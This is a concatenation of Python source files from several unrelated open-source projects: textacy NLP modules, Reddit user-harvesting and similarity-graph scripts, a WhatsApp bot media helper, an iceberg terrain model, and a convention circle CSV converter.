text_lines.index("---") text_lines = text_lines[header_idx + 1 :] except ValueError: pass return preprocessing.normalize_whitespace("\n".join(text_lines)) def __iter__(self): self._check_data() for item in self.index: filepath = self._texts_dirpath.joinpath(item["filename"]) record = item.copy() record["text"] = self._load_and_parse_text_file(filepath) yield record def _filtered_iter(self, lang): # this dataset is unusual in that the only filter we can really offer is lang # so we might as well avoid loading texts in unwanted languages if lang: self._check_data() lang = utils.validate_set_members(lang, str, valid_vals=self.langs) for item in self.index: if item["lang"] in lang: filepath = self._texts_dirpath.joinpath(item["filename"]) record = item.copy() record["text"] = self._load_and_parse_text_file(filepath) yield record else: for record in self: yield record def texts( self, *, lang: Optional[Union[str, Set[str]]] = None, limit: Optional[int] = None, ) -> Iterable[str]: """ Iterate over records in this dataset, optionally filtering by language, and yield texts only. Args: lang: Filter records by the language in which they're written; see :attr:`UDHR.langs`. limit: Yield no more than ``limit`` texts that match specified filter. Yields: Text of the next record in dataset passing filters. Raises: ValueError: If any filtering options are invalid. """ for record in itertools.islice(self._filtered_iter(lang), limit): yield record["text"] def records( self, *, lang: Optional[Union[str, Set[str]]] = None, limit: Optional[int] = None, ) -> Iterable[Tuple[str, dict]]: """ Iterate over reocrds in this dataset, optionally filtering by a language, and yield text + metadata pairs. Args: lang: Filter records by the language in which they're written; see :attr:`UDHR.langs`. limit: Yield no more than ``limit`` texts that match specified filter. Yields: Text of the next record in dataset passing filters, and its corresponding metadata. Raises: ValueError: If any filtering options are invalid. """ for record in itertools.islice(self._filtered_iter(lang), limit): yield record.pop("text"), record ``` #### File: src/textacy/errors.py ```python from typing import Any, Collection, Type def value_invalid_msg(name: str, value: Any, valid_values: Collection[Any],) -> str: return f"`{name}` value = {value} is invalid; value must be one of {valid_values}." def type_invalid_msg(name: str, val_type: Type, valid_val_type: Type,) -> str: return f"`{name}` type = {val_type} is invalid; type must match {valid_val_type}." ``` #### File: textacy/ke/scake.py ```python import collections import itertools import operator from typing import ( cast, Callable, Collection, Counter, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple, Union, ) import networkx as nx from cytoolz import itertoolz from spacy.tokens import Doc, Token from .. import utils from . import utils as ke_utils def scake( doc: Doc, *, normalize: Optional[Union[str, Callable[[Token], str]]] = "lemma", include_pos: Optional[Union[str, Collection[str]]] = ("NOUN", "PROPN", "ADJ"), topn: Union[int, float] = 10, ) -> List[Tuple[str, float]]: """ Extract key terms from a document using the sCAKE algorithm. Args: doc: spaCy ``Doc`` from which to extract keyterms. Must be sentence-segmented; optionally POS-tagged. normalize: If "lemma", lemmatize terms; if "lower", lowercase terms; if None, use the form of terms as they appeared in ``doc``; if a callable, must accept a ``Token`` and return a str, e.g. :func:`textacy.spacier.utils.get_normalized_text()`. include_pos: One or more POS tags with which to filter for good candidate keyterms. If None, include tokens of all POS tags (which also allows keyterm extraction from docs without POS-tagging.) topn: Number of top-ranked terms to return as key terms. If an integer, represents the absolute number; if a float, value must be in the interval (0.0, 1.0], which is converted to an int by ``int(round(len(candidates) * topn))`` Returns: Sorted list of top ``topn`` key terms and their corresponding scores. References: Duari, Swagata & <NAME>. (2018). sCAKE: Semantic Connectivity Aware Keyword Extraction. Information Sciences. 477. https://arxiv.org/abs/1811.10831v1 """ # validate / transform args include_pos = cast(Set[str], utils.to_collection(include_pos, str, set)) if isinstance(topn, float): if not 0.0 < topn <= 1.0: raise ValueError( "topn={} is invalid; " "must be an int, or a float between 0.0 and 1.0".format(topn) ) # bail out on empty docs if not doc: return [] # build up a graph of good words, edges weighting by adjacent sentence co-occurrence cooc_mat: Counter[Tuple[str, str]] = collections.Counter() # handle edge case where doc only has 1 sentence n_sents = itertoolz.count(doc.sents) for window_sents in itertoolz.sliding_window(min(2, n_sents), doc.sents): if n_sents == 1: window_sents = (window_sents[0], []) window_words: Iterable[str] = ( word for word in itertoolz.concat(window_sents) if not (word.is_stop or word.is_punct or word.is_space) and (not include_pos or word.pos_ in include_pos) ) window_words = ke_utils.normalize_terms(window_words, normalize) cooc_mat.update( w1_w2 for w1_w2 in itertools.combinations(sorted(window_words), 2) if w1_w2[0] != w1_w2[1] ) # doc doesn't have any valid words... if not cooc_mat: return [] graph = nx.Graph() graph.add_edges_from( (w1, w2, {"weight": weight}) for (w1, w2), weight in cooc_mat.items() ) word_scores = _compute_word_scores(doc, graph, cooc_mat, normalize) if not word_scores: return [] # generate a list of candidate terms candidates = _get_candidates(doc, normalize, include_pos) if isinstance(topn, float): topn = int(round(len(set(candidates)) * topn)) # rank candidates by aggregating constituent word scores candidate_scores = { " ".join(candidate): sum(word_scores.get(word, 0.0) for word in candidate) for candidate in candidates } sorted_candidate_scores = sorted( candidate_scores.items(), key=operator.itemgetter(1, 0), reverse=True ) return ke_utils.get_filtered_topn_terms( sorted_candidate_scores, topn, match_threshold=0.8 ) def _compute_word_scores( doc: Doc, graph: nx.Graph, cooc_mat: Dict[Tuple[str, str], int], normalize: Optional[Union[str, Callable[[Token], str]]], ) -> Dict[str, float]: word_strs: List[str] = list(graph.nodes()) # "level of hierarchy" component max_truss_levels = _compute_node_truss_levels(graph) max_truss_level = max(max_truss_levels.values()) # check for edge case when all word scores would be zero / undefined if not max_truss_level: return {} # "semantic strength of a word" component sem_strengths: Dict[str, int] = { w: sum( cooc_mat[tuple(sorted([w, nbr]))] * max_truss_levels[nbr] for nbr in graph.neighbors(w) ) for w in word_strs } # "semantic connectivity" component sem_connectivities = { w: len(set(max_truss_levels[nbr] for nbr in graph.neighbors(w))) / max_truss_level for w in word_strs } # "positional weight" component word_pos: DefaultDict[str, float] = collections.defaultdict(float) for word, word_str in zip(doc, ke_utils.normalize_terms(doc, normalize)): word_pos[word_str] += 1 / (word.i + 1) return { w: word_pos[w] * max_truss_levels[w] * sem_strengths[w] * sem_connectivities[w] for w in word_strs } def _get_candidates( doc: Doc, normalize: Optional[Union[str, Callable[[Token], str]]], include_pos: Set[str], ) -> Set[Tuple[str, ...]]: """ Get a set of candidate terms to be scored by joining the longest subsequences of valid words -- non-stopword and non-punct, filtered to nouns, proper nouns, and adjectives if ``doc`` is POS-tagged -- then normalized into strings. """ def _is_valid_tok(tok): return not (tok.is_stop or tok.is_punct or tok.is_space) and ( not include_pos or tok.pos_ in include_pos ) candidates = ke_utils.get_longest_subsequence_candidates(doc, _is_valid_tok) return { tuple(ke_utils.normalize_terms(candidate, normalize)) for candidate in candidates } def _compute_node_truss_levels(graph: nx.Graph) -> Dict[str, int]: """ Reference: <NAME> & Faber, Vance & <NAME>, David. (2018). Bounds and algorithms for $k$-truss. https://arxiv.org/abs/1806.05523v1 """ max_edge_ks = {} is_removed: DefaultDict[tuple, int] = collections.defaultdict(int) triangle_counts = { edge: len(set(graph.neighbors(edge[0])) & set(graph.neighbors(edge[1]))) for edge in graph.edges() } # rather than iterating over all theoretical values of k # let's break out early once all edges have been removed # max_edge_k = math.ceil(math.sqrt(len(triangle_counts))) # for k in range(1, max_edge_k): k = 1 while True: to_remove = collections.deque( edge for edge, tcount in triangle_counts.items() if tcount < k and not is_removed[edge] ) while to_remove: edge = to_remove.popleft() is_removed[edge] = 1 for nbr in set(graph.neighbors(edge[0])) & set(graph.neighbors(edge[1])): for node in edge: nbr_edge = (node, nbr) try: triangle_counts[nbr_edge] -= 1 except KeyError: # oops, gotta reverse the node ordering on this edge nbr_edge = (nbr, node) triangle_counts[nbr_edge] -= 1 if triangle_counts[nbr_edge] == k - 1: to_remove.append(nbr_edge) is_removed[nbr_edge] = 1 max_edge_ks[edge] = k - 1 # here's where we break out early, if possible if len(is_removed) == len(triangle_counts): break else: k += 1 max_node_ks = { node: max(k for edge, k in max_edge_ks.items() if node in edge) for node in graph.nodes() } return max_node_ks ``` #### File: textacy/preprocessing/remove.py ```python import re import unicodedata from typing import Optional from .resources import _get_punct_translation_table def remove_accents(text: str, *, fast: bool = False) -> str: """ Remove accents from any accented unicode characters in ``text``, either by replacing them with ASCII equivalents or removing them entirely. Args: text fast: If False, accents are removed from any unicode symbol with a direct ASCII equivalent; if True, accented chars for all unicode symbols are removed, regardless. .. note:: ``fast=True`` can be significantly faster than ``fast=False``, but its transformation of ``text`` is less "safe" and more likely to result in changes of meaning, spelling errors, etc. Returns: str Raises: ValueError: If ``method`` is not in {"unicode", "ascii"}. See Also: For a more powerful (but slower) alternative, check out ``unidecode``: https://github.com/avian2/unidecode """ if fast is False: return "".join( char for char in unicodedata.normalize("NFKD", text) if not unicodedata.combining(char) ) else: return ( unicodedata.normalize("NFKD", text) .encode("ascii", errors="ignore") .decode("ascii") ) def remove_punctuation(text: str, *, marks: Optional[str] = None) -> str: """ Remove punctuation from ``text`` by replacing all instances of ``marks`` with whitespace. Args: text marks: Remove only those punctuation marks specified here. For example, ",;:" removes commas, semi-colons, and colons. If None, *all* unicode punctuation marks are removed. Returns: str Note: When ``marks=None``, Python's built-in :meth:`str.translate()` is used to remove punctuation; otherwise, a regular expression is used. The former's performance is about 5-10x faster. """ if marks: return re.sub("[{}]+".format(re.escape(marks)), " ", text, flags=re.UNICODE) else: return text.translate(_get_punct_translation_table()) ``` #### File: textacy/text_stats/api.py ```python import functools import logging from typing import Tuple import pyphen from cachetools import cached from cachetools.keys import hashkey from spacy.tokens import Doc from .. import cache, extract from . import basics, readability LOGGER = logging.getLogger(__name__) class TextStats: """ Class to compute a variety of basic and readability statistics for a given doc, where each stat is a lazily-computed attribute. .. code-block:: pycon >>> text = next(textacy.datasets.CapitolWords().texts(limit=1)) >>> doc = textacy.make_spacy_doc(text) >>> ts = textacy.text_stats.TextStats(doc) >>> ts.n_words 136 >>> ts.n_unique_words 80 >>> ts.entropy 6.00420319027642 >>> ts.flesch_kincaid_grade_level 11.817647058823532 >>> ts.flesch_reading_ease 50.707745098039254 Some stats vary by language or are designed for use with specific languages: .. code-block:: pycon >>> text = ( ... "Muchos años después, frente al pelotón de fusilamiento, " ... "el coronel Aureliano Buendía había de recordar aquella tarde remota " ... "en que su padre lo llevó a conocer el hielo." ... ) >>> doc = textacy.make_spacy_doc(text, lang="es") >>> ts = textacy.text_stats.TextStats(doc) >>> ts.n_words 28 >>> ts.perspicuity_index 56.46000000000002 >>> ts.mu_legibility_index 71.18644067796609 Each of these stats have stand-alone functions in :mod:`textacy.text_stats.basics` and :mod:`textacy.text_stats.readability` with more detailed info and links in the docstrings -- when in doubt, read the docs! Args: doc: A text document tokenized and (optionally) sentence-segmented by spaCy. """ def __init__(self, doc: Doc): self.doc = doc self.lang = doc.vocab.lang self.words = tuple( extract.words(doc, filter_punct=True, filter_stops=False, filter_nums=False) ) self._n_sents = None self._n_words = None self._n_unique_words = None self._n_long_words = None self._n_chars_per_word = None self._n_chars = None self._n_syllables_per_word = None self._n_syllables = None self._n_monosyllable_words = None self._n_polysyllable_words = None self._entropy = None @property def n_sents(self) -> int: """ Number of sentences in document. See Also: :func:`textacy.text_stats.basics.n_sents()` """ if self._n_sents is None: self._n_sents = basics.n_sents(self.doc) return self._n_sents @property def n_words(self) -> int: """ Number of words in document. See Also: :func:`textacy.text_stats.basics.n_words()` """ if self._n_words is None: self._n_words = basics.n_words(self.words) return self._n_words @property def n_unique_words(self) -> int: """ Number of *unique* words in document. See Also: :func:`textacy.text_stats.basics.n_unique_words()` """ if self._n_unique_words is None: self._n_unique_words = basics.n_unique_words(self.words) return self._n_unique_words @property def n_long_words(self) -> int: """ Number of long words in document. See Also: :func:`textacy.text_stats.basics.n_long_words()` """ # TODO: should we vary char threshold by lang? if self._n_long_words is None: self._n_long_words = basics.n_long_words( self.n_chars_per_word, min_n_chars=7, ) return self._n_long_words @property def n_chars_per_word(self) -> Tuple[int, ...]: """ Number of characters for each word in document. See Also: :func:`textacy.text_stats.basics.n_chars_per_word()` """ if self._n_chars_per_word is None: self._n_chars_per_word = basics.n_chars_per_word(self.words) return self._n_chars_per_word @property def n_chars(self) -> int: """ Total number of characters in document. See Also: :func:`textacy.text_stats.basics.n_chars()` """ if self._n_chars is None: self._n_chars = basics.n_chars(self.n_chars_per_word) return self._n_chars @property def n_syllables_per_word(self) -> Tuple[int, ...]: """ Number of syllables for each word in document. See Also: :func:`textacy.text_stats.basics.n_syllables_per_word()` """ if self._n_syllables_per_word is None: self._n_syllables_per_word = basics.n_syllables_per_word( self.words, self.lang, ) return self._n_syllables_per_word @property def n_syllables(self) -> int: """ Total number of syllables in document. See Also: :func:`textacy.text_stats.basics.n_syllables()` """ if self._n_syllables is None: self._n_syllables = basics.n_syllables(self.n_syllables_per_word) return self._n_syllables @property def n_monosyllable_words(self) -> int: """ Number of monosyllobic words in document. See Also: :func:`textacy.text_stats.basics.n_monosyllable_words()` """ if self._n_monosyllable_words is None: self._n_monosyllable_words = basics.n_monosyllable_words( self.n_syllables_per_word, ) return self._n_monosyllable_words @property def n_polysyllable_words(self) -> int: """ Number of polysyllobic words in document. See Also: :func:`textacy.text_stats.basics.n_polysyllable_words()` """ # TODO: should we vary syllable threshold by lang? if self._n_polysyllable_words is None: self._n_polysyllable_words = basics.n_polysyllable_words( self.n_syllables_per_word, min_n_syllables=3, ) return self._n_polysyllable_words @property def entropy(self) -> float: """ Entropy of words in document. See Also: :func:`textacy.text_stats.basics.entropy()` """ if self._entropy is None: self._entropy = basics.entropy(self.words) return self._entropy @property def automated_readability_index(self) -> float: """ Readability test for English-language texts. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.automated_readability_index()` """ return readability.automated_readability_index( self.n_chars, self.n_words, self.n_sents, ) @property def automatic_arabic_readability_index(self) -> float: """ Readability test for Arabic-language texts. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.automatic_arabic_readability_index()` """ if self.lang != "ar": LOGGER.warning( "doc lang = '%s', but automatic arabic readability index is meant " "for use on Arabic-language texts, only" ) return readability.automatic_arabic_readability_index( self.n_chars, self.n_words, self.n_sents, ) @property def coleman_liau_index(self) -> float: """ Readability test, not language-specific. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.coleman_liau_index()` """ return readability.coleman_liau_index(self.n_chars, self.n_words, self.n_sents) @property def flesch_kincaid_grade_level(self) -> float: """ Readability test, not language-specific. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.flesch_kincaid_grade_level()` """ return readability.flesch_kincaid_grade_level( self.n_syllables, self.n_words, self.n_sents, ) @property def flesch_reading_ease(self) -> float: """ Readability test with several language-specific formulations. Higher value => easier text. See Also: :func:`textacy.text_stats.readability.flesch_reading_ease()` """ return readability.flesch_reading_ease( self.n_syllables, self.n_words, self.n_sents, lang=self.lang ) @property def gulpease_index(self) -> float: """ Readability test for Italian-language texts. Higher value => easier text. See Also: :func:`textacy.text_stats.readability.gulpease_index()` """ if self.lang != "it": LOGGER.warning( "doc lang = '%s', but gulpease index is meant for use on " "Italian-language texts, only" ) return readability.gulpease_index(self.n_chars, self.n_words, self.n_sents) @property def gunning_fog_index(self) -> float: """ Readability test, not language-specific. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.gunning_fog_index()` """ return readability.gunning_fog_index( self.n_words, self.n_polysyllable_words, self.n_sents, ) @property def lix(self) -> float: """ Readability test for both English- and non-English-language texts. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.lix()` """ return readability.lix(self.n_words, self.n_long_words, self.n_sents) @property def mu_legibility_index(self) -> float: """ Readability test for Spanish-language texts. Higher value => easier text. See Also: :func:`textacy.text_stats.readability.mu_legibility_index()` """ if self.lang != "es": LOGGER.warning( "doc lang = '%s', but mu legibility index is meant for use on " "Spanish-language texts, only" ) return readability.mu_legibility_index(self.n_chars_per_word) @property def perspicuity_index(self) -> float: """ Readability test for Spanish-language texts. Higher value => easier text. See Also: :func:`textacy.text_stats.readability.perspicuity_index()` """ if self.lang != "es": LOGGER.warning( "doc lang = '%s', but perspicuity index is meant for use on " "Spanish-language texts, only" ) return readability.perspicuity_index( self.n_syllables, self.n_words, self.n_sents, ) @property def smog_index(self) -> float: """ Readability test, not language-specific. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.smog_index()` """ return readability.smog_index(self.n_polysyllable_words, self.n_sents) @property def wiener_sachtextformel(self) -> float: """ Readability test for German-language texts. Higher value => more difficult text. See Also: :func:`textacy.text_stats.readability.wiener_sachtextformel()` """ if self.lang != "es": LOGGER.warning( "doc lang = '%s', but wiener sachtextformel is meant for use on " "German-language texts, only" ) return readability.wiener_sachtextformel( self.n_words, self.n_polysyllable_words, self.n_monosyllable_words, self.n_long_words, self.n_sents, variant=1, ) @cached(cache.LRU_CACHE, key=functools.partial(hashkey, "hyphenator")) def load_hyphenator(lang: str): """ Load an object that hyphenates words at valid points, as used in LaTex typesetting. Args: lang: Standard 2-letter language abbreviation. To get a list of valid values:: >>> import pyphen; pyphen.LANGUAGES Returns: :class:`pyphen.Pyphen()` """ LOGGER.debug("loading '%s' language hyphenator", lang) return pyphen.Pyphen(lang=lang) ```
{ "source": "8wgf3b/reddit-harvest", "score": 3 }
#### File: reddit-harvest/mining/analysis.py ```python import networkx as nx import pandas as pd import matplotlib.pyplot as plt import numpy as np import os from tqdm import tqdm from sklearn.preprocessing import minmax_scale def raw_matrix(data_loc='users/', period=None): period = str(period) if period else '' user_list = next(os.walk(data_loc))[1] file_names = data_loc + '{}/subreddits' + period + '.csv' df_list = [] for user in tqdm(user_list): filename = file_names.format(user) try: df_list.append(pd.read_csv(filename, index_col=0, names=[user], header=0)) except FileNotFoundError as e: print(e) continue raw_df = pd.concat(df_list, axis=1, sort=False).fillna(0) return raw_df def modified_min_max_scaler(m, axis=0): m = m.astype('float') m[m == 0] = 'nan' if axis == 0: m = minmax_scale(m) else: m = minmax_scale(m.T).T m[np.isnan(m)] = 0 return m def AGM_matrix(raw_df, node_type='u', norm=None): users_list = list(raw_df) subs_list = list(raw_df.index) raw_matrix = raw_df.values if norm is not None: raw_matrix = modified_min_max_scaler(raw_matrix, norm) if node_type == 'r': raw_matrix = raw_matrix.T sim_matrix = 1 - np.exp(- raw_matrix.T @ raw_matrix) column_names = users_list if node_type == 'u' else subs_list return pd.DataFrame(data=sim_matrix, index=column_names, columns=column_names) def create_graph(sim_df): dist = -np.log(sim_df) G = nx.Graph() names = sim_df.index size = len(names) G.add_nodes_from(sim_df.index) for i in tqdm(range(size - 1)): for j in range(i + 1, size): u = names[i] v = names[j] weight = dist[u][v] if weight == np.inf: continue G.add_edge(u, v, weight=weight) return G def nbr_subgraph(G, node, n=20): edges = sorted(list(G.edges(node, data=True)), key=lambda x: x[2]['weight']) sg = nx.Graph() sg.add_edges_from(edges[:n]) return sg def graph_with_length(G): pos = nx.spring_layout(G, weight='weight') nx.draw_networkx(G, pos=pos) def save_output(name, out_loc='outputs/', data_loc='users/', period=None): x = name.split('/') raw_df = raw_matrix(data_loc, period) norm = 0 if x[0] is 'u' else 1 sim_df = AGM_matrix(raw_df, node_type=x[0], norm=norm) G = create_graph(sim_df) sub = nbr_subgraph(G, x[1], 10) graph_with_length(sub) period = str(period) if period else '' fname = out_loc + period + '_'.join(x) + '.png' plt.savefig(fname, dpi=1000) if __name__ == '__main__': pass ``` #### File: reddit-harvest/mining/reddit.py ```python import requests from random import random from functools import partial def recent_authors(subreddit=None, total=100, c_ratio=random()): total = 500 if total > 500 else total sub_address = 'https://api.pushshift.io/reddit/submission/search' comm_address = 'https://api.pushshift.io/reddit/comment/search' params = { 'fields': 'author' } if subreddit is not None: params['subreddit'] = subreddit auth_list = [] params['size'] = int(round(total * (1 - c_ratio))) r = requests.get(sub_address, params=params).json()['data'] auth_list.extend([x['author'] for x in r]) params['size'] = int(round(total * c_ratio)) r = requests.get(comm_address, params=params).json()['data'] auth_list.extend([x['author'] for x in r]) return list(set(auth_list) - {"AutoModerator", "[deleted]"}) def top_authors(subreddit=None, total=100, type='avg', period=30): comm_address = 'https://api.pushshift.io/reddit/comment/search' params = { 'size': 0, 'agg_size': total, 'metadata': True, 'aggs': 'author:score:' + type } if period is not None: params['after'] = '{}d'.format(period) if subreddit is not None: params['subreddit'] = subreddit r = requests.get(comm_address, params=params).json()['aggs']['author:score'] auth_list = [x['key'] for x in r] return list(set(auth_list) - {"AutoModerator", "[deleted]"}) top_authors_avg = partial(top_authors, type='avg', period=30) top_authors_sum = partial(top_authors, type='sum', period=30) if __name__ == '__main__': print(top_authors_sum('the_donald')) ```
{ "source": "8wgf3b/rpi_server", "score": 3 }
#### File: cogs/helper/util.py ```python import asyncio import functools def aiofy(func): @functools.wraps(func) def wrapper(*args, **kwargs): loop = asyncio.get_event_loop() lfunc = lambda: func(*args, **kwargs) return loop.run_in_executor(None, lfunc) return wrapper ```
{ "source": "8wgf3b/WAbot", "score": 3 }
#### File: 8wgf3b/WAbot/media.py ```python import pyimgur import requests import os, shutil def echoimage(URL, file=False): im = pyimgur.Imgur(os.environ['IMGUR_CID']) #url can be sent directly but i wanted to test the temp directory's usage if file == False: response = requests.get(URL) if response.status_code == 200: with open("temp/echoim.jpg", 'wb') as f: f.write(response.content) uploaded_image = im.upload_image("temp/echoim.jpg", title="twilwhatbot") else: uploaded_image = im.upload_image(URL, title="twilwhatbot") return uploaded_image.link def clean(path = 'temp/', log = False): for file in os.listdir(path): if file == '.gitkeep': continue file_path = os.path.join(path, file) try: if os.path.isfile(file_path): os.unlink(file_path) except Exception as e: print(e) if log == True: return '\n'.join(os.listdir(path)) def sudoku(URL): im = pyimgur.Imgur(os.environ['IMGUR_CID']) response = requests.get(URL) if response.status_code == 200: with open("temp/sudoku.jpg", 'wb') as f: f.write(response.content) cropped, squares, digits = croppedsquaredigits('temp/sudoku.jpg') frame = numonim(cropped, squares, digits) cv2.imwrite('temp/solvedsudoku.jpg',frame) uploaded_image = im.upload_image("temp/solvedsudoku.jpg", title="twilwhatbot") return uploaded_image.link if __name__ == '__main__': print(clean(log =True)) ```
{ "source": "8woodcockd/white_star_line-model", "score": 3 }
#### File: 8woodcockd/white_star_line-model/terrain.py ```python class Ice: """Assign attributes to each identified ice cell. """ def __init__(self, i, j, radar, lidar, lidar_unit_height, pixel_area, ice_mass_density, fraction_ice_asl, cols_radar): """Assign attributes to each identified ice cell. """ self._x = j self._y = i self._radar = radar[i][j] self._lidar = lidar[i][j] self._id = 0 self._height = lidar[i][j] * lidar_unit_height self._volume_asl = self.height * pixel_area self._volume_tot = self.volume_asl * (1 / fraction_ice_asl) self._mass_asl = self.volume_asl * ice_mass_density self._mass_tot = self.mass_asl * (1 / fraction_ice_asl) self._cols_radar = cols_radar self._neighbours = [] self._tug = False @property def x(self): """The x position (easting). Specify the conditions to get_x, set_x, and del_x. """ if self._x < self._cols_radar: return self._x else: print('The x value is outside of the acceptable range.') @x.setter def x(self, value): if isinstance(value, int) == False: print('x value must be integer') return if 0 <= value <= self._cols_radar: self._x = value else: print('x value entered is outside of the acceptable range') @x.deleter def x(self): print('You cannot delete the ice.x attributes.') return @property def y(self): """The y position (northing). Specify the conditions to get_y, the conditions to set_y and the conditions to del_y. """ if self._y < self._cols_radar: return self._y else: print('The y value is outside of the acceptable range.') @y.setter def y(self, value): if isinstance(value, int) == False: print('y value must be integer') return if 0 <= value <= self._cols_radar: self._y = value else: print('y value entered is outside of the acceptable range') @y.deleter def y(self): print('You cannot delete the ice y attributes.') return @property def radar(self): """The radar value associated with the ice cell. Specify the conditions to get_radar, set_radar, and del_radar. """ return self._radar @radar.setter def radar(self, value): self._radar = value @radar.deleter def radar(self): print('You cannot delete the radar attribute.') return @property def lidar(self): """The lidar value associated with the ice cell. Specify the conditions to get_lidar, set_lidar, and del_lidar. """ return self._lidar @lidar.setter def lidar(self, value): self._lidar = value @lidar.deleter def lidar(self): print('You cannot delete the lidar attribute.') return @property def id(self): """The identification number given to each cell of ice to specify which iceberg it is associated with. Specify the conditions to get_id, the conditions to set_id, and the conditions to del_id """ return self._id @id.setter def id(self, value): if self._id > 0: print('Cannot change iceberg ID.') else: self._id = value @id.deleter def id(self): print('You cannot delete the iceberg ID.') return @property def height(self): """The height of the ice above sea level. Specify the conditions to get_height, the conditions to set_height, and the conditions to del_height. """ return self._height @height.setter def height(self, value): self._height = value @height.deleter def height(self): print('You cannot delete the height attribute.') return @property def volume_asl(self): """The volume of ice above sea level at the specified terrain position (raster cell). Specify the conditions to get_volume_asl, the conditions to set_volume_asl, and the conditions to del_volume_asl. """ return self._volume_asl @volume_asl.setter def volume_asl(self, value): self._volume_asl = value @volume_asl.deleter def volume_asl(self): print('You cannot delete the volume_asl attribute.') return @property def volume_tot(self): """The total volume of ice above and below sea level at the specified terrain position (raster cell). Specify the conditions to get_volume_tot, the conditions to set_volume_tot, and the conditions to del_volume_tot. """ return self._volume_tot @volume_tot.setter def volume_tot(self, value): self._volume_tot = value @volume_tot.deleter def volume_tot(self): print('You cannot delete the volume_tot attribute.') return @property def mass_asl(self): """The mass of ice above sea level at the specified terrain position (raster cell). Specify the conditions to get_mass_asl, the conditions to set_mass_asl, and the conditions to del_mass_asl. """ return self._mass_asl @mass_asl.setter def mass_asl(self, value): self._mass_asl = value @mass_asl.deleter def mass_asl(self): print('You cannot delete the mass_asl attribute.') return @property def mass_tot(self): """The total mass of ice above and below sea level at the specified terrain position (raster cell). Specify the conditions to get_mass_tot, the conditions to set_mass_tot, and the conditions to del_mass_tot. """ return self._mass_tot @mass_tot.setter def mass_tot(self, value): self._mass_tot = value @mass_tot.deleter def mass_tot(self): print('You cannot delete the mass_tot attribute.') return @property def cols_radar(self): """The number of columns in the raster grid of the radar data (the lidar data should have the same number of columns). Specify the conditions to get_cols_radar, set_cols_radar, and del_cols_radar. """ return self._cols_radar @cols_radar.setter def cols_radar(self, value): self._cols_radar = value @cols_radar.deleter def cols_radar(self): print('You cannot delete the cols_radar attribute.') return @property def neighbours(self): """A list of the adjacent ice cells in the raster grid. Specify the conditions to get_neighbours, set_neighbours, and del_neighbours. """ return self._neighbours @neighbours.setter def neighbours(self, value): print('Cannot change neighbours attribute.') @neighbours.deleter def neighbours(self): print('You cannot delete the neighbours attribute.') return @property def tug(self): """A boolean property which identifies whether the ice cell is part of an iceberg that can be tugged. Specify the conditions to get_tug, set_tug, and del_tug. """ return self._tug @tug.setter def tug(self, value): if self._tug > 0: print('Cannot change the assigned tug attribute.') self._tug = value @tug.deleter def tug(self): print('You cannot delete the tug attribute.') return class Sea: """Assign attributes to each identified non-ice cell (assumed sea). """ def __init__(self, i, j, radar, lidar): """Assign attributes to each identified ice cell. """ self._x = i self._y = j self._radar = self self._lidar = lidar[i][j] @property def x(self): """The x position (easting). Specify the conditions to get_x, set_x, and del_x. """ if self._x < self._cols_radar: return self._x else: print('The x value is outside of the acceptable range.') @x.setter def x(self, value): if isinstance(value, int) == False: print('x value must be integer') return if 0 <= value <= self._cols_radar: self._x = value else: print('x value entered is outside of the acceptable range') @x.deleter def x(self): print('You cannot delete the x attribute.') return @property def y(self): """The y position (northing). Specify the conditions to get_y, the conditions to set_y and the conditions to del_y. """ if self._y < self._cols_radar: return self._y else: print('The y value is outside of the acceptable range.') @y.setter def y(self, value): if isinstance(value, int) == False: print('y value must be integer') return if 0 <= value <= self._cols_radar: self._y = value else: print('y value entered is outside of the acceptable range') @y.deleter def y(self): print('You cannot delete the y attribute.') return @property def radar(self): """The radar value associated with the sea cell. Specify the conditions to get_radar, set_radar, and del_radar. """ return self._radar @radar.setter def radar(self, value): self._radar = value @radar.deleter def radar(self): print('You cannot delete the radar attribute.') return @property def lidar(self): """The lidar value associated with the sea cell. Specify the conditions to get_lidar, set_lidar, and del_lidar. """ return self._lidar @lidar.setter def lidar(self, value): self._lidar = value @lidar.deleter def lidar(self): print('You cannot delete the lidar attribute.') return ```
{ "source": "9001/battleplan", "score": 3 }
#### File: battleplan/tools/csv2html-03-json.py ```python import os import sys import csv import codecs import operator import romkan import jaconv import html import unicodedata import json SJIS_WARN = False s1 = u"アイウエオカキクケコ" # a=wall s2 = u"サシスセソタチツテト" s3 = u"ナニヌネノハヒフヘホ" # na=wall s4 = u"マミムメモヤユヨラリ" w1a = u"れぬねのはひふへほまみむめも" # re=wall w1b = u"やゆよらりる" w2a = u"あくけこさしすせそたちつてと" # a=wall w2b = u"いうえおかき" w3a = u"ABCDEFGHIJKL" # a=wall w3b = u"MNOPQR" all_rows = w3a + w3b + w2a + w2b + w1a + w1b + s1 + s2 + s3 + s4 all_halls = { "s1": s1, "s2": s2, "s3": s3, "s4": s4, "w1a": w1a, "w1b": w1b, "w2a": w2a, "w2b": w2b, "w3a": w3a, "w3b": w3b, } all_days = ['土', '日', '月', '火'] def main(): r = [] print("loading csv") with open(sys.argv[1], "r", encoding="utf-8") as fgz: fcsv = csv.reader(fgz, delimiter=",") for cr in fcsv: if cr[0] != "Circle": # print('skipping; cr[0] =', cr[0]) continue if len(cr) != 29: raise Exception("unexpected num fields {}".format(len(cr))) v = { "imageid": cr[1], "ccc-gui-color-probably": cr[2], "ccc-gui-page-number": cr[3], "ccc-gui-page-offset": cr[4], "day": cr[5], "hall": cr[6], "row": cr[7], "col": cr[8], "ngenre": cr[9], "cirnam1": cr[10], "cirnam2": cr[11], "authnam": cr[12], "prodnam": cr[13], "urlmain": cr[14], "mail": cr[15], "desc": cr[16], "x7": cr[17], # always blank "x": cr[18], "y": cr[19], "x10": cr[20], "subcol": "ab"[int(cr[21])], "description": cr[22], "urlcata": cr[23], "urlcirc": cr[24], "x13": cr[25], # always blank "urltwit": cr[26], "urlpxiv": cr[27], "x14": cr[28], # always blank } v["loc"] = "".join( [v["hall"], v["row"], str(v["col"]).rjust(2, "0"), v["subcol"]] ) r.append(v) for nday, cday in enumerate(all_days, 1): print("writing day {}".format(nday)) ret = [] rd = [x for x in r if x["day"] == cday] for hallname, rows in sorted(all_halls.items()): for row in rows: for v in [x for x in rd if x["row"] == row]: romaji = jaconv.h2z(v["cirnam2"]) 